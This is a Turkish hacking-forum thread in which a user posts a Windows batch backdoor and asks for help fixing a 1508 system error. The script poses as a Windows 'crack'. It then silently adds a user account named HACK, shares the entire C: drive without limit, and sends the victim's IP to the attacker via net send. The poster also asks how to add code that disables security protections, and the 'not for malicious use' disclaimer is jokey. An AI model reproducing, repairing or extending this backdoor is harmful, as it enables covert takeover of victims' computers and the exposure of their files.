1508 sistem hatası ?

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

ßy_Torjen

Üye
26 Ağu 2009
214
0
system32
Bir adaet backdoor programı yazdım Dos komutlarıyla ama 1508 sistem hatası diye çok saçma sorunlarla karşılaşıyorum bi çözemedim dos programlama bilen çok kişi yokta soramıyorum acaba yardım edermisiniz??
kodlarşöle::
net start Messenger
@echo off
color ce
echo ********************************************************

echo §§§§§§§§§_§§§§§§§§§_§§§§§§§§§_____§§§_§§§§§§§_§§§§§____§§§
echo ___§§§____§§§___§§§_§§§___§§§_____§§§_§§§_____§§§_§§___§§§
echo ___§§§____§§§___§§§_§§§§§§§§§_____§§§_§§§§§§__§§§__§§__§§§
echo ___§§§____§§§___§§§_§§§__§§§__§§__§§§_§§§_____§§§___§§_§§§
echo ___§§§____§§§§§§§§§_§§§___§§§_§§§§§§§_§§§§§§§_§§§____§§§§§

echo ********************************************************
echo Windows'unuzu cracklemek icin....
pause
@echo on

net user HACK /add
net share system=C:\ /unlimited
net send (buraya kendi ıp yazın)
çalışma şekli : HACK adında bir adminisrator yetkilerine sahip bir user hesabı açıyor ve c:/ sınırsız paylaşıma sunuyor kişinin ıp sini Windosw Messanger Servis yoluyla size atıyor bu windowsun bir nimeti olduğundan herhabgi bir AV tehtid unsuru değildir....(sizin için çalıştırdım ve saldırılara açığım :D)
ve bunu biraz daha ilerletip güvenlik sistemlerini kapatan bir kod daha eklicem ama nasıl bide onu bilen warmı ?
(NOT : KÖTÜ amaçla kullanılması KEsinlikle YAsaktır...xD)))
123iko.jpg

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.